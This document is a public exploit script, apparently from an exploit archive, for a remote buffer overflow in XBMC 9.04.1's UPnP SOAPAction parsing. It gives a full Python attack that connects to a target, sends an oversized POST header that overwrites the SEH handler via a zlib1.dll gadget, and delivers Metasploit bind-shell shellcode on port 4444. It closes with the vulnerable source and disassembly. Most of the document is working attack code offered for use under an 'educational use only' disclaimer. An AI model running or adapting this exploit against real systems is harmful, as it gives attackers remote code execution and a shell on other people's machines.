XBMC 9.04.1r20672 - 'soap_action_name' POST UPnP 'sscanf' Remote Buffer Overflow

#!/usr/bin/env python 

'''                   - XBMC upnp Remote Buffer Overflow -
=========================================================================
! Exploit Title: Xbmc soap_action_name post upnp sscanf buffer overflow !
=========================================================================
Date: 28th October 2010
=======================
Author: n00b  Realname: *carl cope* 
===================================
Software Link: http://xbmc.org/download/
========================================
Version: All versions are affected.
===================================
Tested on: Windows xp sp3,Vista sp2.
XBMC 9.04.1r20672 compiled june 2 2009. <--Version tested.
----------------------------------------------------------


-Description-
Well i had a little time to spare so i decided to revisit the
xbmc application and give it another look over which is a good
thing as i just have not had to time to work on exploit development 
lately and have to put more important things first unfortunately.

I decided to test the upnp protocol that was built into xbmc using the
Platinum UPnP SDK.And come across a sscanf buffer overflow
as you can see in the source code at the bottom of this exploit
that 100 bytes is allocated into a temp stack and then passed to
the sscanf function with no bounds check in place then its finally 
passed to PLT_HttpHelper::ParseBody which reads the xml body and parse it.
I've tested this exploit on windows and linux both work (Read comments).

All versions of xbmc where tested even the Dharma Beta 3 release is
also exploitable.But as ive worked with the xbmc developers before i 
know it will be fixed and patched as soon as i have informed them
great guys unlike other vendors i've worked with in the past.

I know the vulnerable function was marked with FIX ME = no sscanf.
They must have either missed it or have not got round to fixing this
yet.(See bottom of exploit for code)

The buffer overflow exists because of the vulnerable sdk used in the 
xbmc application.All versions of xbmc are exploitable but version 9.11
modules is compiled with seh protection.And i know previous release 
loaded the zlib1 module which was not compiled with safe seh.


See poc code for information and list of vendors.!!

-Description-


----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
 
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''

import sys, socket 
import struct


#Windows version does not change port every time its restarted.!!
#linux version changes port every time xbmc is restarted.!!

port = 52569 #You will have to find it on vuln server.
host = sys.argv[1] 

'''          !!IMPORTATNT!!                       
The UUID must be set i've hardcoded this 
to make it easy to replace with the victim UUID
you can get the UUID number from the server
by issuing a get request to the vulnerable server
on port 00000 you can use a web browser to do this.
example = http://127.0.0.1:00000


-Note-
Just a side note the port is random and once the xbmc
application is installed the UUID will be set up along 
with the port number at installation so you will have to 
do a port scan to find what port the service is running
on but once its found it will be on that port till it 
is reinstalled.Also the UUID will stay the same.

Universally Unique Identifier
---------------------------------------------------
XML example
<UDN>
uuid:0970aa46-ee68-3174-d548-44b656447658
</UDN> 
---------------------------------------------------
-Note-

I was not going to write an xml paraser just for this
when a web browser and a set of eyes can do it.:)

Xbmc media player uses the Platinum UPnP SDK 
http://www.plutinosoft.com/platinum
'''

#Create upnp request and place it in Request !!
Start_url ='AVTransport/'
Uuid = '1edcbdab-e75b-57fe-dbfa-55cc24ee630c' #Replace with the vuln server's Universally Unique Identifier. 
End_url ='/control.xml HTTP/1.1\n'
Soap = 'SOAPACTION: "urn:schemas-upnp-org:service:AVTransport:1#'
Junk_buffer1 = 'A'*128
Junk_buffer2 = 'B'*100

###The same address i used for the last xbmc exploits.
###/SafeSEH Module Scanner, item 55
# SEH mode=/SafeSEH OFF
# Base=0x62e80000
# Limit=0x62e97000
# Module Name=C:\Program Files\XBMC\zlib1.dll
###
###This was found in the module zlib1 and is universal.
#62E83BAC   5B               POP EBX
#62E83BAD   5D               POP EBP
#62E83BAE  ^E9 CDD9FFFF      JMP zlib1.compressBound

Pointer_To_Next_SEH = struct.pack('<L',0x909006eb)
SE_Handler = struct.pack('<L',0x62E83BAC)
Content_type = '\nCONTENT-TYPE:text/xml; charset="utf-8"\n'
Host = 'HOST: 192.168.1.2:50988\n'
Content_length = 'Content-Length: 345'

Shell_code=(#/*win32_bind -  EXITFUNC=seh LPORT=4444 Size=696
            #Encoder=Alpha2 http://metasploit.com */
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x37\x49\x49\x49\x49\x49"
    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x69"
    "\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x79\x32\x42\x42\x32\x41\x42"
    "\x42\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x39\x6c\x31"
    "\x7a\x4a\x4b\x72\x6d\x59\x78\x78\x79\x59\x6f\x49\x6f\x79\x6f\x45"
    "\x30\x4c\x4b\x70\x6c\x61\x34\x34\x64\x6c\x4b\x71\x55\x77\x4c\x4c"
    "\x4b\x63\x4c\x43\x35\x41\x68\x56\x61\x68\x6f\x4e\x6b\x70\x4f\x56"
    "\x78\x6e\x6b\x51\x4f\x65\x70\x77\x71\x5a\x4b\x31\x59\x6e\x6b\x47"
    "\x44\x6e\x6b\x45\x51\x6a\x4e\x75\x61\x6b\x70\x6c\x59\x6e\x4c\x4d"
    "\x54\x4f\x30\x31\x64\x54\x47\x59\x51\x39\x5a\x46\x6d\x77\x71\x39"
    "\x52\x78\x6b\x6b\x44\x57\x4b\x73\x64\x51\x34\x71\x38\x30\x75\x6d"
    "\x35\x6c\x4b\x71\x4f\x74\x64\x73\x31\x78\x6b\x51\x76\x4c\x4b\x74"
    "\x4c\x70\x4b\x4e\x6b\x51\x4f\x77\x6c\x36\x61\x4a\x4b\x43\x33\x56"
    "\x4c\x4e\x6b\x4c\x49\x30\x6c\x47\x54\x45\x4c\x31\x71\x78\x43\x30"
    "\x31\x4b\x6b\x50\x64\x6c\x4b\x50\x43\x70\x30\x4e\x6b\x57\x30\x34"
    "\x4c\x4e\x6b\x32\x50\x55\x4c\x6c\x6d\x4e\x6b\x41\x50\x63\x38\x61"
    "\x4e\x55\x38\x4e\x6e\x50\x4e\x66\x6e\x4a\x4c\x50\x50\x49\x6f\x6e"
    "\x36\x52\x46\x36\x33\x70\x66\x30\x68\x44\x73\x65\x62\x30\x68\x44"
    "\x37\x73\x43\x35\x62\x31\x4f\x71\x44\x4b\x4f\x38\x50\x45\x38\x5a"
    "\x6b\x78\x6d\x6b\x4c\x75\x6b\x56\x30\x79\x6f\x6b\x66\x61\x4f\x4f"
    "\x79\x6b\x55\x43\x56\x4c\x41\x7a\x4d\x37\x78\x35\x52\x66\x35\x50"
    "\x6a\x34\x42\x79\x6f\x58\x50\x41\x78\x78\x59\x67\x79\x4c\x35\x6e"
    "\x4d\x73\x67\x79\x6f\x4e\x36\x50\x53\x46\x33\x76\x33\x42\x73\x51"
    "\x43\x53\x73\x70\x53\x77\x33\x56\x33\x6b\x4f\x78\x50\x65\x36\x43"
    "\x58\x66\x71\x31\x4c\x73\x56\x33\x63\x6c\x49\x59\x71\x7a\x35\x30"
    "\x68\x4e\x44\x36\x7a\x62\x50\x39\x57\x76\x37\x6b\x4f\x6b\x66\x43"
    "\x5a\x32\x30\x72\x71\x32\x75\x39\x6f\x58\x50\x30\x68\x39\x34\x4e"
    "\x4d\x66\x4e\x4a\x49\x51\x47\x4b\x4f\x49\x46\x66\x33\x62\x75\x79"
    "\x6f\x4a\x70\x62\x48\x4d\x35\x33\x79\x6b\x36\x71\x59\x66\x37\x4b"
    "\x4f\x5a\x76\x76\x30\x50\x54\x70\x54\x70\x55\x4b\x4f\x6e\x30\x4a"
    "\x33\x30\x68\x4b\x57\x43\x49\x38\x46\x74\x39\x63\x67\x6b\x4f\x58"
    "\x56\x61\x45\x4b\x4f\x6e\x30\x51\x76\x41\x7a\x65\x34\x42\x46\x31"
    "\x78\x30\x63\x62\x4d\x6f\x79\x6b\x55\x33\x5a\x36\x30\x56\x39\x31"
    "\x39\x48\x4c\x4f\x79\x6d\x37\x73\x5a\x33\x74\x6b\x39\x6d\x32\x67"
    "\x41\x59\x50\x6c\x33\x6c\x6a\x79\x6e\x33\x72\x54\x6d\x49\x6e\x70"
    "\x42\x34\x6c\x6e\x73\x6c\x4d\x30\x7a\x34\x78\x4c\x6b\x4c\x6b\x4c"
    "\x6b\x42\x48\x50\x72\x39\x6e\x6d\x63\x52\x36\x49\x6f\x61\x65\x50"
    "\x44\x49\x6f\x7a\x76\x63\x6b\x71\x47\x31\x42\x73\x61\x51\x41\x66"
    "\x31\x30\x6a\x44\x41\x31\x41\x63\x61\x71\x45\x32\x71\x59\x6f\x6e"
    "\x30\x70\x68\x4c\x6d\x6e\x39\x53\x35\x7a\x6e\x41\x43\x49\x6f\x79"
    "\x46\x52\x4a\x6b\x4f\x6b\x4f\x65\x67\x4b\x4f\x7a\x70\x6e\x6b\x30"
    "\x57\x59\x6c\x6d\x53\x6a\x64\x50\x64\x39\x6f\x5a\x76\x52\x72\x39"
    "\x6f\x5a\x70\x50\x68\x58\x70\x6f\x7a\x54\x44\x63\x6f\x52\x73\x4b"
    "\x4f\x6a\x76\x49\x6f\x4e\x30\x69"
)

# create a socket object called 'c' 
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 

# connect to the socket 
c.connect((host, port)) 

Request = (Start_url + Uuid + End_url + Soap + Junk_buffer1 + Pointer_To_Next_SEH +
 SE_Handler + Shell_code + Junk_buffer2 + Content_type + Host + Content_length)

# create a file-like object to read 
fileobj = c.makefile('r', 0) 
 
fileobj.write("POST /"+Request+"") 




#                  -Vulnerable source code-
# This information was found using windows 7 + Visual c++ 2010 express.

# .\xbmc\xbmc\lib\libUPnP\Platinum\Source\Core\PltDeviceHost.cpp

# /*----------------------------------------------------------------------
# |   PLT_DeviceHost::ProcessPostRequest
# +---------------------------------------------------------------------*/
# NPT_Result
# PLT_DeviceHost::ProcessHttpPostRequest(NPT_HttpRequest&              request,
                                       # const NPT_HttpRequestContext& context,
                                       # NPT_HttpResponse&             response) 
# {
    # NPT_Result                res;
    # NPT_String                service_type;
    # NPT_String                str;
    # NPT_XmlElementNode*       xml = NULL;
    # NPT_String                soap_action_header;
    # PLT_Service*              service;
    # NPT_XmlElementNode*       soap_body;
    # NPT_XmlElementNode*       soap_action;
    # const NPT_String*         attr;
    # PLT_ActionDesc*           action_desc;
    # PLT_ActionReference       action;
    # NPT_MemoryStreamReference resp(new NPT_MemoryStream);
    # NPT_String                ip_address  = context.GetRemoteAddress().GetIpAddress().ToString();
    # NPT_String                method      = request.GetMethod();
    # NPT_String                url         = request.GetUrl().ToRequestString(true);
    # NPT_String                protocol    = request.GetProtocol();

    # if (NPT_FAILED(FindServiceByControlURL(url, service, true)))
        # goto bad_request;

    # if (!request.GetHeaders().GetHeaderValue("SOAPAction"))
        # goto bad_request;

    # // extract the soap action name from the header
    # soap_action_header = *request.GetHeaders().GetHeaderValue("SOAPAction");
    # soap_action_header.TrimLeft('"');
    # soap_action_header.TrimRight('"');
    # char prefix[200];
    # char soap_action_name[100];                    <--- 100 bytes allocated for the soap action name.
    # int  ret;
    # //FIXME: no sscanf
    # ret = sscanf(soap_action_header, "%[^#]#%s",   <--- 
                 # prefix,                           <--- Bad very Bad.
                 # soap_action_name);                <--- 
    # if (ret != 2)
        # goto bad_request;

    # // read the xml body and parse it
    # if (NPT_FAILED(PLT_HttpHelper::ParseBody(request, xml))) <--- BOOOM I WIN!!
        # goto bad_request;

# Disassembly of vulnerable function.!!
# ==================================
# 025D2D23  lea         edx,[ebp-1F4h]  
# 025D2D29  push        edx  
# 025D2D2A  lea         eax,[ebp-188h]  
# 025D2D30  push        eax  
# 025D2D31  push        2F5E404h  
# 025D2D36  lea         ecx,[ebp-44h]  
# 025D2D39  call        NPT_String::operator char const * (1B1840Eh)  
# 025D2D3E  push        eax  
# 025D2D3F  call        @ILT+120575(_sscanf) (1AF7704h)  
# 025D2D44  add         esp,10h  
# 025D2D47  mov         dword ptr [ebp-1FCh],eax